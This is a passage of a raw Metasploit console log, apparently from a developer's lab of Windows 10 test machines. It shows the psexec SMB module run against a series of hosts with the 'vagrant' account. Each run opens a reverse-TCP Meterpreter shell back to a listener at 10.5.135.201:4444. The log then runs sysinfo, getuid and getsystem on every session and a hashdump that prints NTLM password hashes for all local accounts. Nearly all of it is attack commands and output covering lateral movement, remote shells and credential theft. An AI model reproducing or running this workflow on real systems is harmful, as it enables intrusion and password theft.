opened (10.5.135.201:4444 -> 10.5.134.150:49937) at 2024-01-18 14:17:18 -0600 [*] Session 15 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.151 rhost => 10.5.134.151 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.151:445 - Connecting to the server... [*] 10.5.134.151:445 - Authenticating to 10.5.134.151:445 as user 'vagrant'... [*] 10.5.134.151:445 - Selecting PowerShell target [*] 10.5.134.151:445 - Executing the payload... [+] 10.5.134.151:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.151 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 16 opened (10.5.135.201:4444 -> 10.5.134.151:49842) at 2024-01-18 14:17:22 -0600 [*] Session 16 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.152 rhost => 10.5.134.152 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.152:445 - Connecting to the server... [*] 10.5.134.152:445 - Authenticating to 10.5.134.152:445 as user 'vagrant'... [*] 10.5.134.152:445 - Selecting PowerShell target [*] 10.5.134.152:445 - Executing the payload... [+] 10.5.134.152:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.152 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 17 opened (10.5.135.201:4444 -> 10.5.134.152:49825) at 2024-01-18 14:17:26 -0600 [*] Session 17 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.157 rhost => 10.5.134.157 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.157:445 - Connecting to the server... [*] 10.5.134.157:445 - Authenticating to 10.5.134.157:445 as user 'vagrant'... [*] 10.5.134.157:445 - Selecting PowerShell target [*] 10.5.134.157:445 - Executing the payload... [+] 10.5.134.157:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.157 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 18 opened (10.5.135.201:4444 -> 10.5.134.157:49814) at 2024-01-18 14:17:29 -0600 [*] Session 18 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.171 rhost => 10.5.134.171 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.171:445 - Connecting to the server... [*] 10.5.134.171:445 - Authenticating to 10.5.134.171:445 as user 'vagrant'... [*] 10.5.134.171:445 - Selecting PowerShell target [*] 10.5.134.171:445 - Executing the payload... [+] 10.5.134.171:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.171 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 19 opened (10.5.135.201:4444 -> 10.5.134.171:49782) at 2024-01-18 14:17:33 -0600 [*] Session 19 created in the background. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.188 rhost => 10.5.134.188 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.188:445 - Connecting to the server... [*] 10.5.134.188:445 - Authenticating to 10.5.134.188:445 as user 'vagrant'... [*] 10.5.134.188:445 - Selecting PowerShell target [*] 10.5.134.188:445 - Executing the payload... [-] 10.5.134.188:445 - Service failed to start - ACCESS_DENIED [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/psexec) > set rhost 10.5.134.192 rhost => 10.5.134.192 msf6 exploit(windows/smb/psexec) > run -z [*] Started reverse TCP handler on 10.5.135.201:4444 [*] 10.5.134.192:445 - Connecting to the server... [*] 10.5.134.192:445 - Authenticating to 10.5.134.192:445 as user 'vagrant'... [*] 10.5.134.192:445 - Selecting PowerShell target [*] 10.5.134.192:445 - Executing the payload... [+] 10.5.134.192:445 - Service start timed out, OK if running a command or non-service executable... WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used [*] Sending stage (185926 bytes) to 10.5.134.192 WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used [*] Meterpreter session 20 opened (10.5.135.201:4444 -> 10.5.134.192:49824) at 2024-01-18 14:17:53 -0600 [*] Session 20 created in the background. msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 11 (10.5.134.111) Computer : WIN10X64_1703 OS : Windows 10 (10.0 Build 15063). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 12 (10.5.134.132) Computer : WIN10X64_1803 OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 13 (10.5.134.145) Computer : WIN10X64_1511 OS : Windows 10 (10.0 Build 10586). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 14 (10.5.134.149) Computer : WIN10X64 OS : Windows 10 (10.0 Build 10240). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 15 (10.5.134.150) Computer : WIN10X64_1709 OS : Windows 10 (10.0 Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 16 (10.5.134.151) Computer : WIN10X64_20H2 OS : Windows 10 (10.0 Build 19042). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 17 (10.5.134.152) Computer : WIN10X64_1809 OS : Windows 10 (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 18 (10.5.134.157) Computer : WIN10X64_2004 OS : Windows 10 (10.0 Build 19041). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 19 (10.5.134.171) Computer : WIN10X64_1607 OS : Windows 10 (10.0 Build 14393). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 20 (10.5.134.192) Computer : WIN10X64_21H1 OS : Windows 10 (10.0 Build 19043). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 11 (10.5.134.111) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 12 (10.5.134.132) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 13 (10.5.134.145) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 14 (10.5.134.149) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 15 (10.5.134.150) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 16 (10.5.134.151) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 17 (10.5.134.152) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 18 (10.5.134.157) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 19 (10.5.134.171) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 20 (10.5.134.192) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 11 (10.5.134.111) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 12 (10.5.134.132) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 13 (10.5.134.145) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 14 (10.5.134.149) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 15 (10.5.134.150) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 16 (10.5.134.151) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 17 (10.5.134.152) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 18 (10.5.134.157) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 19 (10.5.134.171) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 20 (10.5.134.192) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 11 (10.5.134.111) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 12 (10.5.134.132) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d8384ae77d76137afd52d904f6e23a56::: [*] Running 'hashdump' on meterpreter session 13 (10.5.134.145) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 14 (10.5.134.149) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 15 (10.5.134.150) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:96811640642b7e8a6465a8d64208da82::: [*] Running 'hashdump' on meterpreter session 16 (10.5.134.151) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011::: [*] Running 'hashdump' on meterpreter session 17 (10.5.134.152) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3ef1bcaa8bac173c69ea6636117eec5c::: [*] Running 'hashdump' on meterpreter session 18 (10.5.134.157) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7ee181ddb6556b468f3af0a9036cfa5f::: [*] Running 'hashdump' on meterpreter session 19 (10.5.134.171) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: 